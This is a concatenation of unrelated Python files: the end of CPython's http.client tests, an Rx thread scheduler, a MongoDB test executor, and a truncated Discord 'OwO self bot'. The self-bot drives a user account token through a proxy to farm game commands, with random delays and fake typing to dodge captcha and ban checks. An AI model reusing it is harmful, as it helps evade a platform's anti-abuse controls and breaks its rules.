timeout=None)
httpConn.connect()
finally:
socket.setdefaulttimeout(None)
self.assertEqual(httpConn.sock.gettimeout(), None)
httpConn.close()
# a value
httpConn = client.HTTPConnection(HOST, TimeoutTest.PORT, timeout=30)
httpConn.connect()
self.assertEqual(httpConn.sock.gettimeout(), 30)
httpConn.close()
class PersistenceTest(TestCase):
def test_reuse_reconnect(self):
# Should reuse or reconnect depending on header from server
tests = (
('1.0', '', False),
('1.0', 'Connection: keep-alive\r\n', True),
('1.1', '', True),
('1.1', 'Connection: close\r\n', False),
('1.0', 'Connection: keep-ALIVE\r\n', True),
('1.1', 'Connection: cloSE\r\n', False),
)
for version, header, reuse in tests:
with self.subTest(version=version, header=header):
msg = (
'HTTP/{} 200 OK\r\n'
'{}'
'Content-Length: 12\r\n'
'\r\n'
'Dummy body\r\n'
).format(version, header)
conn = FakeSocketHTTPConnection(msg)
self.assertIsNone(conn.sock)
conn.request('GET', '/open-connection')
with conn.getresponse() as response:
self.assertEqual(conn.sock is None, not reuse)
response.read()
self.assertEqual(conn.sock is None, not reuse)
self.assertEqual(conn.connections, 1)
conn.request('GET', '/subsequent-request')
self.assertEqual(conn.connections, 1 if reuse else 2)
def test_disconnected(self):
def make_reset_reader(text):
"""Return BufferedReader that raises ECONNRESET at EOF"""
stream = io.BytesIO(text)
def readinto(buffer):
size = io.BytesIO.readinto(stream, buffer)
if size == 0:
raise ConnectionResetError()
return size
stream.readinto = readinto
return io.BufferedReader(stream)
tests = (
(io.BytesIO, client.RemoteDisconnected),
(make_reset_reader, ConnectionResetError),
)
for stream_factory, exception in tests:
with self.subTest(exception=exception):
conn = FakeSocketHTTPConnection(b'', stream_factory)
conn.request('GET', '/eof-response')
self.assertRaises(exception, conn.getresponse)
self.assertIsNone(conn.sock)
# HTTPConnection.connect() should be automatically invoked
conn.request('GET', '/reconnect')
self.assertEqual(conn.connections, 2)
def test_100_close(self):
conn = FakeSocketHTTPConnection(
b'HTTP/1.1 100 Continue\r\n'
b'\r\n'
# Missing final response
)
conn.request('GET', '/', headers={'Expect': '100-continue'})
self.assertRaises(client.RemoteDisconnected, conn.getresponse)
self.assertIsNone(conn.sock)
conn.request('GET', '/reconnect')
self.assertEqual(conn.connections, 2)
class HTTPSTest(TestCase):
def setUp(self):
if not hasattr(client, 'HTTPSConnection'):
self.skipTest('ssl support required')
def make_server(self, certfile):
from test.ssl_servers import make_https_server
return make_https_server(self, certfile=certfile)
def test_attributes(self):
# simple test to check it's storing the timeout
h = client.HTTPSConnection(HOST, TimeoutTest.PORT, timeout=30)
self.assertEqual(h.timeout, 30)
def test_networked(self):
# Default settings: requires a valid cert from a trusted CA
import ssl
support.requires('network')
with socket_helper.transient_internet('self-signed.pythontest.net'):
h = client.HTTPSConnection('self-signed.pythontest.net', 443)
with self.assertRaises(ssl.SSLError) as exc_info:
h.request('GET', '/')
self.assertEqual(exc_info.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
def test_networked_noverification(self):
# Switch off cert verification
import ssl
support.requires('network')
with socket_helper.transient_internet('self-signed.pythontest.net'):
context = ssl._create_unverified_context()
h = client.HTTPSConnection('self-signed.pythontest.net', 443,
context=context)
h.request('GET', '/')
resp = h.getresponse()
h.close()
self.assertIn('nginx', resp.getheader('server'))
resp.close()
@support.system_must_validate_cert
def test_networked_trusted_by_default_cert(self):
# Default settings: requires a valid cert from a trusted CA
support.requires('network')
with socket_helper.transient_internet('www.python.org'):
h = client.HTTPSConnection('www.python.org', 443)
h.request('GET', '/')
resp = h.getresponse()
content_type = resp.getheader('content-type')
resp.close()
h.close()
self.assertIn('text/html', content_type)
def test_networked_good_cert(self):
# We feed the server's cert as a validating cert
import ssl
support.requires('network')
selfsigned_pythontestdotnet = 'self-signed.pythontest.net'
with socket_helper.transient_internet(selfsigned_pythontestdotnet):
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(context.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(context.check_hostname, True)
context.load_verify_locations(CERT_selfsigned_pythontestdotnet)
try:
h = client.HTTPSConnection(selfsigned_pythontestdotnet, 443,
context=context)
h.request('GET', '/')
resp = h.getresponse()
except ssl.SSLError as ssl_err:
ssl_err_str = str(ssl_err)
# In the error message of [SSL: CERTIFICATE_VERIFY_FAILED] on
# modern Linux distros (Debian Buster, etc) default OpenSSL
# configurations it'll fail saying "key too weak" until we
# address https://bugs.python.org/issue36816 to use a proper
# key size on self-signed.pythontest.net.
if re.search(r'(?i)key.too.weak', ssl_err_str):
raise unittest.SkipTest(
f'Got {ssl_err_str} trying to connect '
f'to {selfsigned_pythontestdotnet}. '
'See https://bugs.python.org/issue36816.')
raise
server_string = resp.getheader('server')
resp.close()
h.close()
self.assertIn('nginx', server_string)
def test_networked_bad_cert(self):
# We feed a "CA" cert that is unrelated to the server's cert
import ssl
support.requires('network')
with socket_helper.transient_internet('self-signed.pythontest.net'):
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.load_verify_locations(CERT_localhost)
h = client.HTTPSConnection('self-signed.pythontest.net', 443, context=context)
with self.assertRaises(ssl.SSLError) as exc_info:
h.request('GET', '/')
self.assertEqual(exc_info.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
def test_local_unknown_cert(self):
# The custom cert isn't known to the default trust bundle
import ssl
server = self.make_server(CERT_localhost)
h = client.HTTPSConnection('localhost', server.port)
with self.assertRaises(ssl.SSLError) as exc_info:
h.request('GET', '/')
self.assertEqual(exc_info.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
def test_local_good_hostname(self):
# The (valid) cert validates the HTTP hostname
import ssl
server = self.make_server(CERT_localhost)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.load_verify_locations(CERT_localhost)
h = client.HTTPSConnection('localhost', server.port, context=context)
self.addCleanup(h.close)
h.request('GET', '/nonexistent')
resp = h.getresponse()
self.addCleanup(resp.close)
self.assertEqual(resp.status, 404)
def test_local_bad_hostname(self):
# The (valid) cert doesn't validate the HTTP hostname
import ssl
server = self.make_server(CERT_fakehostname)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.load_verify_locations(CERT_fakehostname)
h = client.HTTPSConnection('localhost', server.port, context=context)
with self.assertRaises(ssl.CertificateError):
h.request('GET', '/')
# Same with explicit check_hostname=True
with support.check_warnings(('', DeprecationWarning)):
h = client.HTTPSConnection('localhost', server.port,
context=context, check_hostname=True)
with self.assertRaises(ssl.CertificateError):
h.request('GET', '/')
# With check_hostname=False, the mismatching is ignored
context.check_hostname = False
with support.check_warnings(('', DeprecationWarning)):
h = client.HTTPSConnection('localhost', server.port,
context=context, check_hostname=False)
h.request('GET', '/nonexistent')
resp = h.getresponse()
resp.close()
h.close()
self.assertEqual(resp.status, 404)
# The context's check_hostname setting is used if one isn't passed to
# HTTPSConnection.
context.check_hostname = False
h = client.HTTPSConnection('localhost', server.port, context=context)
h.request('GET', '/nonexistent')
resp = h.getresponse()
self.assertEqual(resp.status, 404)
resp.close()
h.close()
# Passing check_hostname to HTTPSConnection should override the
# context's setting.
with support.check_warnings(('', DeprecationWarning)):
h = client.HTTPSConnection('localhost', server.port,
context=context, check_hostname=True)
with self.assertRaises(ssl.CertificateError):
h.request('GET', '/')
@unittest.skipIf(not hasattr(client, 'HTTPSConnection'),
'http.client.HTTPSConnection not available')
def test_host_port(self):
# Check invalid host_port
for hp in ("www.python.org:abc", "user:password@www.python.org"):
self.assertRaises(client.InvalidURL, client.HTTPSConnection, hp)
for hp, h, p in (("[fe80::207:e9ff:fe9b]:8000",
"fe80::207:e9ff:fe9b", 8000),
("www.python.org:443", "www.python.org", 443),
("www.python.org:", "www.python.org", 443),
("www.python.org", "www.python.org", 443),
("[fe80::207:e9ff:fe9b]", "fe80::207:e9ff:fe9b", 443),
("[fe80::207:e9ff:fe9b]:", "fe80::207:e9ff:fe9b",
443)):
c = client.HTTPSConnection(hp)
self.assertEqual(h, c.host)
self.assertEqual(p, c.port)
def test_tls13_pha(self):
import ssl
if not ssl.HAS_TLSv1_3:
self.skipTest('TLS 1.3 support required')
# just check status of PHA flag
h = client.HTTPSConnection('localhost', 443)
self.assertTrue(h._context.post_handshake_auth)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertFalse(context.post_handshake_auth)
h = client.HTTPSConnection('localhost', 443, context=context)
self.assertIs(h._context, context)
self.assertFalse(h._context.post_handshake_auth)
with warnings.catch_warnings():
warnings.filterwarnings('ignore', 'key_file, cert_file and check_hostname are deprecated',
DeprecationWarning)
h = client.HTTPSConnection('localhost', 443, context=context,
cert_file=CERT_localhost)
self.assertTrue(h._context.post_handshake_auth)
class RequestBodyTest(TestCase):
"""Test cases where a request includes a message body."""
def setUp(self):
self.conn = client.HTTPConnection('example.com')
        self.conn.sock = self.sock = FakeSocket("")
def get_headers_and_fp(self):
f = io.BytesIO(self.sock.data)
f.readline() # read the request line
message = client.parse_headers(f)
return message, f
def test_list_body(self):
# Note that no content-length is automatically calculated for
# an iterable. The request will fall back to send chunked
# transfer encoding.
cases = (
([b'foo', b'bar'], b'3\r\nfoo\r\n3\r\nbar\r\n0\r\n\r\n'),
((b'foo', b'bar'), b'3\r\nfoo\r\n3\r\nbar\r\n0\r\n\r\n'),
)
for body, expected in cases:
with self.subTest(body):
self.conn = client.HTTPConnection('example.com')
self.conn.sock = self.sock = FakeSocket('')
self.conn.request('PUT', '/url', body)
msg, f = self.get_headers_and_fp()
self.assertNotIn('Content-Type', msg)
self.assertNotIn('Content-Length', msg)
self.assertEqual(msg.get('Transfer-Encoding'), 'chunked')
self.assertEqual(expected, f.read())
def test_manual_content_length(self):
# Set an incorrect content-length so that we can verify that
# it will not be over-ridden by the library.
self.conn.request("PUT", "/url", "body",
{"Content-Length": "42"})
message, f = self.get_headers_and_fp()
self.assertEqual("42", message.get("content-length"))
self.assertEqual(4, len(f.read()))
def test_ascii_body(self):
self.conn.request("PUT", "/url", "body")
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
self.assertEqual("4", message.get("content-length"))
self.assertEqual(b'body', f.read())
def test_latin1_body(self):
self.conn.request("PUT", "/url", "body\xc1")
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
self.assertEqual("5", message.get("content-length"))
self.assertEqual(b'body\xc1', f.read())
def test_bytes_body(self):
self.conn.request("PUT", "/url", b"body\xc1")
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
self.assertEqual("5", message.get("content-length"))
self.assertEqual(b'body\xc1', f.read())
def test_text_file_body(self):
self.addCleanup(support.unlink, support.TESTFN)
with open(support.TESTFN, "w") as f:
f.write("body")
with open(support.TESTFN) as f:
self.conn.request("PUT", "/url", f)
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
# No content-length will be determined for files; the body
# will be sent using chunked transfer encoding instead.
self.assertIsNone(message.get("content-length"))
self.assertEqual("chunked", message.get("transfer-encoding"))
self.assertEqual(b'4\r\nbody\r\n0\r\n\r\n', f.read())
def test_binary_file_body(self):
self.addCleanup(support.unlink, support.TESTFN)
with open(support.TESTFN, "wb") as f:
f.write(b"body\xc1")
with open(support.TESTFN, "rb") as f:
self.conn.request("PUT", "/url", f)
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
self.assertEqual("chunked", message.get("Transfer-Encoding"))
self.assertNotIn("Content-Length", message)
self.assertEqual(b'5\r\nbody\xc1\r\n0\r\n\r\n', f.read())
class HTTPResponseTest(TestCase):
def setUp(self):
body = "HTTP/1.1 200 Ok\r\nMy-Header: first-value\r\nMy-Header: \
second-value\r\n\r\nText"
sock = FakeSocket(body)
self.resp = client.HTTPResponse(sock)
self.resp.begin()
def test_getting_header(self):
header = self.resp.getheader('My-Header')
self.assertEqual(header, 'first-value, second-value')
header = self.resp.getheader('My-Header', 'some default')
self.assertEqual(header, 'first-value, second-value')
def test_getting_nonexistent_header_with_string_default(self):
header = self.resp.getheader('No-Such-Header', 'default-value')
self.assertEqual(header, 'default-value')
def test_getting_nonexistent_header_with_iterable_default(self):
header = self.resp.getheader('No-Such-Header', ['default', 'values'])
self.assertEqual(header, 'default, values')
header = self.resp.getheader('No-Such-Header', ('default', 'values'))
self.assertEqual(header, 'default, values')
def test_getting_nonexistent_header_without_default(self):
header = self.resp.getheader('No-Such-Header')
self.assertEqual(header, None)
def test_getting_header_defaultint(self):
header = self.resp.getheader('No-Such-Header',default=42)
self.assertEqual(header, 42)
class TunnelTests(TestCase):
def setUp(self):
response_text = (
'HTTP/1.0 200 OK\r\n\r\n' # Reply to CONNECT
'HTTP/1.1 200 OK\r\n' # Reply to HEAD
'Content-Length: 42\r\n\r\n'
)
self.host = 'proxy.com'
self.conn = client.HTTPConnection(self.host)
self.conn._create_connection = self._create_connection(response_text)
def tearDown(self):
self.conn.close()
def _create_connection(self, response_text):
def create_connection(address, timeout=None, source_address=None):
return FakeSocket(response_text, host=address[0], port=address[1])
return create_connection
def test_set_tunnel_host_port_headers(self):
tunnel_host = 'destination.com'
tunnel_port = 8888
tunnel_headers = {'User-Agent': 'Mozilla/5.0 (compatible, MSIE 11)'}
self.conn.set_tunnel(tunnel_host, port=tunnel_port,
headers=tunnel_headers)
self.conn.request('HEAD', '/', '')
self.assertEqual(self.conn.sock.host, self.host)
self.assertEqual(self.conn.sock.port, client.HTTP_PORT)
self.assertEqual(self.conn._tunnel_host, tunnel_host)
self.assertEqual(self.conn._tunnel_port, tunnel_port)
self.assertEqual(self.conn._tunnel_headers, tunnel_headers)
def test_disallow_set_tunnel_after_connect(self):
# Once connected, we shouldn't be able to tunnel anymore
self.conn.connect()
self.assertRaises(RuntimeError, self.conn.set_tunnel,
'destination.com')
def test_connect_with_tunnel(self):
self.conn.set_tunnel('destination.com')
self.conn.request('HEAD', '/', '')
self.assertEqual(self.conn.sock.host, self.host)
self.assertEqual(self.conn.sock.port, client.HTTP_PORT)
self.assertIn(b'CONNECT destination.com', self.conn.sock.data)
# issue22095
self.assertNotIn(b'Host: destination.com:None', self.conn.sock.data)
self.assertIn(b'Host: destination.com', self.conn.sock.data)
# This test should be removed when CONNECT gets the HTTP/1.1 blessing
self.assertNotIn(b'Host: proxy.com', self.conn.sock.data)
def test_connect_put_request(self):
self.conn.set_tunnel('destination.com')
self.conn.request('PUT', '/', '')
self.assertEqual(self.conn.sock.host, self.host)
self.assertEqual(self.conn.sock.port, client.HTTP_PORT)
self.assertIn(b'CONNECT destination.com', self.conn.sock.data)
self.assertIn(b'Host: destination.com', self.conn.sock.data)
def test_tunnel_debuglog(self):
expected_header = 'X-Dummy: 1'
response_text = 'HTTP/1.0 200 OK\r\n{}\r\n\r\n'.format(expected_header)
self.conn.set_debuglevel(1)
self.conn._create_connection = self._create_connection(response_text)
self.conn.set_tunnel('destination.com')
with support.captured_stdout() as output:
self.conn.request('PUT', '/', '')
lines = output.getvalue().splitlines()
self.assertIn('header: {}'.format(expected_header), lines)
if __name__ == '__main__':
unittest.main(verbosity=2)
|
newthreadscheduler.py
|
import logging
import threading
from .scheduler import Scheduler
from .eventloopscheduler import EventLoopScheduler
log = logging.getLogger('Rx')
class NewThreadScheduler(Scheduler):
"""Creates an object that schedules each unit of work on a separate thread.
"""
def __init__(self, thread_factory=None):
super(NewThreadScheduler, self).__init__()
def default_factory(target, args=None):
t = threading.Thread(target=target, args=args or [])
            t.daemon = True
return t
self.thread_factory = thread_factory or default_factory
def schedule(self, action, state=None):
"""Schedules an action to be executed."""
scheduler = EventLoopScheduler(thread_factory=self.thread_factory, exit_if_empty=True)
return scheduler.schedule(action, state)
def schedule_relative(self, duetime, action, state=None):
"""Schedules an action to be executed after duetime."""
scheduler = EventLoopScheduler(thread_factory=self.thread_factory, exit_if_empty=True)
return scheduler.schedule_relative(duetime, action, state)
def schedule_absolute(self, duetime, action, state=None):
"""Schedules an action to be executed at duetime."""
        return self.schedule_relative(duetime - self.now(), action, state=state)
Scheduler.new_thread = new_thread_scheduler = NewThreadScheduler()
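# Illustrative usage sketch (not part of the original module): scheduling a one-off
# action on the module-level new_thread_scheduler instance. It assumes the usual Rx
# convention that scheduled actions are invoked as action(scheduler, state); the
# action name and state value below are made up for the demo.
if __name__ == '__main__':
    import time
    def _print_state(scheduler, state):
        print('action ran on %s with state %r' % (threading.current_thread().name, state))
    new_thread_scheduler.schedule(_print_state, state='hello')
    time.sleep(0.5)  # give the worker thread a moment to run before the script exits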
|
executor.py
|
"""Driver of the test execution framework."""
from __future__ import absolute_import
import threading
import time
from . import fixtures
from . import hook_test_archival as archival
from . import hooks as _hooks
from . import job as _job
from . import report as _report
from . import testcases
from .. import config as _config
from .. import errors
from .. import utils
from ..core import network
from ..utils import queue as _queue
class TestSuiteExecutor(object): # pylint: disable=too-many-instance-attributes
"""Execute a test suite.
Responsible for setting up and tearing down the fixtures that the
tests execute against.
"""
_TIMEOUT = 24 * 60 * 60 # =1 day (a long time to have tests run)
def __init__( # pylint: disable=too-many-arguments
self, exec_logger, suite, config=None, fixture=None, hooks=None, archive_instance=None,
archive=None):
"""Initialize the TestSuiteExecutor with the test suite to run."""
self.logger = exec_logger
if _config.SHELL_CONN_STRING is not None:
# Specifying the shellConnString command line option should override the fixture
# specified in the YAML configuration to be the no-op fixture.
self.fixture_config = {"class": fixtures.NOOP_FIXTURE_CLASS}
else:
self.fixture_config = fixture
self.hooks_config = utils.default_if_none(hooks, [])
self.test_config = utils.default_if_none(config, {})
self.archival = None
if archive_instance:
self.archival = archival.HookTestArchival(suite, self.hooks_config, archive_instance,
archive)
self._suite = suite
self.test_queue_logger = self.logger.new_testqueue_logger(suite.test_kind)
# Only start as many jobs as we need. Note this means that the number of jobs we run may
# not actually be _config.JOBS or self._suite.options.num_jobs.
jobs_to_start = self._suite.options.num_jobs
self.num_tests = len(suite.tests) * self._suite.options.num_repeat_tests
if self.num_tests < jobs_to_start:
self.logger.info(
"Reducing the number of jobs from %d to %d since there are only %d test(s) to run.",
self._suite.options.num_jobs, self.num_tests, self.num_tests)
jobs_to_start = self.num_tests
# Must be done after getting buildlogger configuration.
self._jobs = [self._make_job(job_num) for job_num in xrange(jobs_to_start)]
def run(self):
"""Execute the test suite.
Any exceptions that occur during setting up or tearing down a
fixture are propagated.
"""
self.logger.info("Starting execution of %ss...", self._suite.test_kind)
return_code = 0
# The first run of the job will set up the fixture.
setup_flag = threading.Event()
# We reset the internal state of the PortAllocator so that ports used by the fixture during
# a test suite run earlier can be reused during this current test suite.
network.PortAllocator.reset()
teardown_flag = None
try:
num_repeat_suites = self._suite.options.num_repeat_suites
while num_repeat_suites > 0:
test_queue = self._make_test_queue()
partial_reports = [job.report for job in self._jobs]
self._suite.record_test_start(partial_reports)
# Have the Job threads destroy their fixture during the final repetition after they
# finish running their last test. This avoids having a large number of processes
# still running if an Evergreen task were to time out from a hang/deadlock being
# triggered.
teardown_flag = threading.Event() if num_repeat_suites == 1 else None
(report, interrupted) = self._run_tests(test_queue, setup_flag, teardown_flag)
self._suite.record_test_end(report)
if setup_flag and setup_flag.is_set():
self.logger.error("Setup of one of the job fixtures failed")
return_code = 2
return
# Remove the setup flag once the first suite ran.
setup_flag = None
# If the user triggered a KeyboardInterrupt, then we should stop.
if interrupted:
raise errors.UserInterrupt("Received interrupt from user")
if teardown_flag and teardown_flag.is_set():
return_code = 2
sb = [] # String builder.
self._suite.summarize_latest(sb)
self.logger.info("Summary: %s", "\n ".join(sb))
if not report.wasSuccessful():
return_code = 1
if self._suite.options.fail_fast:
break
test_report = report.as_dict()
test_results_num = len(test_report["results"])
                # There should be at least as many test results as the expected number of tests.
if test_results_num < self.num_tests:
raise errors.ResmokeError("{} reported tests is less than {} expected tests"
.format(test_results_num, self.num_tests))
# Clear the report so it can be reused for the next execution.
for job in self._jobs:
job.report.reset()
num_repeat_suites -= 1
finally:
if not teardown_flag:
if not self._teardown_fixtures():
return_code = 2
self._suite.return_code = return_code
def _run_tests(self, test_queue, setup_flag, teardown_flag):
"""Start a thread for each Job instance and block until all of the tests are run.
Returns a (combined report, user interrupted) pair, where the
report contains the status and timing information of tests run
by all of the threads.
"""
threads = []
interrupt_flag = threading.Event()
user_interrupted = False
try:
# Run each Job instance in its own thread.
for job in self._jobs:
thr = threading.Thread(target=job, args=(test_queue, interrupt_flag), kwargs=dict(
setup_flag=setup_flag, teardown_flag=teardown_flag))
# Do not wait for tests to finish executing if interrupted by the user.
thr.daemon = True
thr.start()
threads.append(thr)
# SERVER-24729 Need to stagger when jobs start to reduce I/O load if there
# are many of them. Both the 5 and the 10 are arbitrary.
# Currently only enabled on Evergreen.
if _config.STAGGER_JOBS and len(threads) >= 5:
time.sleep(10)
joined = False
while not joined:
# Need to pass a timeout to join() so that KeyboardInterrupt exceptions
# are propagated.
joined = test_queue.join(TestSuiteExecutor._TIMEOUT)
except (KeyboardInterrupt, SystemExit):
interrupt_flag.set()
user_interrupted = True
else:
# Only wait for all the Job instances if not interrupted by the user.
for thr in threads:
thr.join()
reports = [job.report for job in self._jobs]
combined_report = _report.TestReport.combine(*reports)
# We cannot return 'interrupt_flag.is_set()' because the interrupt flag can be set by a Job
# instance if a test fails and it decides to drain the queue. We only want to raise a
# StopExecution exception in TestSuiteExecutor.run() if the user triggered the interrupt.
return (combined_report, user_interrupted)
def _teardown_fixtures(self):
"""Tear down all of the fixtures.
Returns true if all fixtures were torn down successfully, and
false otherwise.
"""
success = True
for job in self._jobs:
if not job.teardown_fixture():
self.logger.warning("Teardown of %s of job %s was not successful", job.fixture,
job.job_num)
success = False
return success
def _make_fixture(self, job_num, job_logger):
"""Create a fixture for a job."""
fixture_config = {}
fixture_class = fixtures.NOOP_FIXTURE_CLASS
if self.fixture_config is not None:
fixture_config = self.fixture_config.copy()
fixture_class = fixture_config.pop("class")
fixture_logger = job_logger.new_fixture_logger(fixture_class)
return fixtures.make_fixture(fixture_class, fixture_logger, job_num, **fixture_config)
def _make_hooks(self, fixture):
"""Create the hooks for the job's fixture."""
hooks = []
for hook_config in self.hooks_config:
hook_config = hook_config.copy()
hook_class = hook_config.pop("class")
hook_logger = self.logger.new_hook_logger(hook_class, fixture.logger)
hook = _hooks.make_hook(hook_class, hook_logger, fixture, **hook_config)
hooks.append(hook)
return hooks
def _make_job(self, job_num):
"""Return a Job instance with its own fixture, hooks, and test report."""
job_logger = self.logger.new_job_logger(self._suite.test_kind, job_num)
fixture = self._make_fixture(job_num, job_logger)
hooks = self._make_hooks(fixture)
report = _report.TestReport(job_logger, self._suite.options)
return _job.Job(job_num, job_logger, fixture, hooks, report, self.archival,
self._suite.options, self.test_queue_logger)
def _make_test_queue(self):
"""Return a queue of TestCase instances.
Use a multi-consumer queue instead of a unittest.TestSuite so
that the test cases can be dispatched to multiple threads.
"""
# Put all the test cases in a queue.
queue = _queue.Queue()
for _ in range(self._suite.options.num_repeat_tests):
for test_name in self._suite.tests:
test_case = testcases.make_test_case(self._suite.test_kind, self.test_queue_logger,
test_name, **self.test_config)
queue.put(test_case)
# Add sentinel value for each job to indicate when there are no more items to process.
for _ in xrange(len(self._jobs)):
queue.put(None)
return queue
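def _example_drain_test_queue(test_queue, run_one_test):
    """Illustrative sketch (not part of the original framework) of how a consumer
    thread is expected to drain the multi-consumer queue built by _make_test_queue():
    keep pulling test cases until the sentinel None is seen. 'run_one_test' is a
    stand-in callable for whatever actually executes a test case, and the sketch
    assumes the queue follows the standard Queue task_done()/join() protocol.
    """
    while True:
        test_case = test_queue.get()
        try:
            if test_case is None:  # sentinel: no more work for this consumer
                break
            run_one_test(test_case)
        finally:
            test_queue.task_done()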
|
main.py
|
from json.decoder import JSONDecodeError
import discum_c844aef
import time
import multiprocessing
import random
import re
import os
from discum_c844aef.discum import Client
if os.name == 'posix':
import simplejson as json
if os.name == 'nt':
import json
if os.name not in ('nt', 'posix'):
    print("Your OS is not supported. Sorry...")
    time.sleep(2)
    exit()
print("""\
░█████╗░░██╗░░░░░░░██╗░█████╗░ ░██████╗███████╗██╗░░░░░███████╗ ██████╗░░█████╗░████████╗
██╔══██╗░██║░░██╗░░██║██╔══██╗ ██╔════╝██╔════╝██║░░░░░██╔════╝ ██╔══██╗██╔══██╗╚══██╔══╝
██║░░██║░╚██╗████╗██╔╝██║░░██║ ╚█████╗░█████╗░░██║░░░░░█████╗░░ ██████╦╝██║░░██║░░░██║░░░
██║░░██║░░████╔═████║░██║░░██║ ░╚═══██╗██╔══╝░░██║░░░░░██╔══╝░░ ██╔══██╗██║░░██║░░░██║░░░
╚█████╔╝░░╚██╔╝░╚██╔╝░╚█████╔╝ ██████╔╝███████╗███████╗██║░░░░░ ██████╦╝╚█████╔╝░░░██║░░░
░╚════╝░░░░╚═╝░░░╚═╝░░░╚════╝░ ╚═════╝░╚══════╝╚══════╝╚═╝░░░░░ ╚═════╝░░╚════╝░░░░╚═╝░░░
**Version: 1.0.9**""")
time.sleep(2)
try:
from tkinter import messagebox
use_terminal=False
except:
use_terminal=True
once=False
wbm=[12,16]
update = 0
class bot:
commands=[
"owo hunt",
"owo hunt",
"owo battle"
]
class color:
purple = '\033[95m'
okblue = '\033[94m'
okcyan = '\033[96m'
okgreen = '\033[92m'
warning = '\033[93m'
fail = '\033[91m'
reset = '\033[0m'
bold = '\033[1m'
underline = '\033[4m'
if os.name == "nt":
purple = ''
okblue = ''
okcyan = ''
okgreen = ''
warning = ''
fail = ''
reset = ''
bold = ''
underline = ''
owoid=408785106942164992
with open('settings.json', "r") as file:
data = json.load(file)
token = data["token"]
channel = data["channel"]
channel2 = data["owodmid"]
proxy = data["proxy"]
proxyserver = data["proxy_"]["server"]
proxyport = data["proxy_"]["port"]
print('=========================')
print('| |')
print('| [1] Load data |')
print('| [2] Create new data |')
print('| |')
print('========================')
time.sleep(1)
time.sleep(1)
choice = int(input('Enter your choice: '))
if (choice == 1):
pass
if (choice == 2):
os.system('py newdata.py')
def at():
    # Not cached on purpose: every log line needs a fresh timestamp.
    return f'\033[0;43m{time.strftime("%d %b %Y %H:%M:%S", time.localtime())}\033[0;21m'
def report_error(content):
if use_terminal:
print(at(), content)
else:
messagebox.showerror("OWO Auto Farm", content)
client=discum_c844aef.Client(token=bot.token,proxy_host=bot.proxyserver, proxy_port=bot.proxyport, log=False)
def issuechecker():
try:
msgs=client.getMessages(str(bot.channel),num=10)
msgs=json.loads(msgs.text)
owodes=0
for msgone in msgs:
if msgone['author']['id']==str(bot.owoid):
owodes=owodes+1
msgonec=msgone['content']
if "DM me with only" in msgonec:
return "exit"
if "(2/5)" in str(msgonec):
return "exit"
if "(3/5)" in str(msgonec):
return "exit"
if "(4/5)" in str(msgonec):
return "exit"
if "(5/5)" in str(msgonec):
return "exit"
if 'banned' in msgonec:
                    print(f'{at()}{bot.color.fail} !!! [BANNED] !!! {bot.color.reset} your account has been banned from OwO bot; please open an issue on the support Discord server')
return "exit"
if 'complete your captcha' in msgonec:
                    print(f'{at()}{bot.color.warning} !! [CAPTCHA] !! {bot.color.reset} CAPTCHA ACTION REQUIRED {msgonec[-6:]}')
return "exit"
if 'If you have trouble solving the captcha, please ask us in our support guild!' in msgonec:
                    print(f'{at()}{bot.color.warning} !! [CAPTCHA] !! {bot.color.reset} CAPTCHA ACTION REQUIRED')
return "exit"
if 'captcha' in msgonec:
return "exit"
if 'Beep Boop.' in msgonec:
return "exit"
if 'verify that you are human!' in msgonec:
return "exit"
if 'to check that you are a human!' in msgonec:
return "exit"
if '⚠️' in msgonec:
return "exit"
if 'Please DM me with only the following' in msgonec:
return "exit"
if 'Please reply with the following 4 letter word so I can check!' in msgonec:
return "exit"
if not owodes:
return "exit"
except TypeError:
pass
def issuechecker2():
try:
msgs=client.getMessages(str(bot.channel2),num=5)
msgs=json.loads(msgs.text)
owodes=0
for msgone in msgs:
if msgone['author']['id']==str(bot.owoid):
owodes=owodes+1
msgonec=msgone['content']
if 'Are you a real human?' in msgonec:
return "exit"
if 'http://verify.owobot.com' in msgonec:
return "exit"
if '?' in str(msgonec):
return "exit"
if not owodes:
pass
if 'I have verified that you are human! Thank you! :3' in msgonec:
return "nocap"
except TypeError:
pass
except JSONDecodeError:
if os.name == 'nt':
pass
if os.name == 'posix':
pass
else:
input("There is an error while running, do you want to ignore and continue? (YES/NO): ")
if input == 'YES':
pass
if input == 'NO':
print('\033[31m' + '[Exit] Cancelled')
time.sleep(2)
exit()
def security():
if issuechecker() == "exit":
client.sendMessage(str(bot.channel), "@here CAPTCHA!")
report_error("Ban-security triggered, answer the captcha")
exit()
if issuechecker2() == "exit":
client.sendMessage(str(bot.channel), "@here CAPTCHA!")
report_error("Ban-security triggered, found captcha in DMs")
exit()
if issuechecker2() == "nocap":
client.sendMessage(str(bot.channel2), "Ahh yes no captcha, have a nice day!")
pass
def runner():
global wbm
owodes=0
command=random.choice(bot.commands)
command2=random.choice(bot.commands)
client.typingAction(str(bot.channel))
client.sendMessage(str(bot.channel), command)
print(f"{at()}{bot.color.okgreen} [SENT] {bot.color.reset} {command}")
if issuechecker2() == "nocap":
client.sendMessage(str(bot.channel), "owo hunt")
if not owodes:
exit()
if not command2==command:
client.typingAction(str(bot.channel))
time.sleep(13)
client.sendMessage(str(bot.channel), command2)
print(f"{at()}{bot.color.okgreen} [SENT] {bot.color.reset} {command2}")
time.sleep(random.randint(wbm[0],wbm[1]))
def owopray():
client.sendMessage(str(bot.channel), "owo pray")
print(f"{at()}{bot.color.okgreen} [SENT] {bot.color.reset} owo pray")
time.sleep(13)
def gems():
client.typingAction(str(bot.channel))
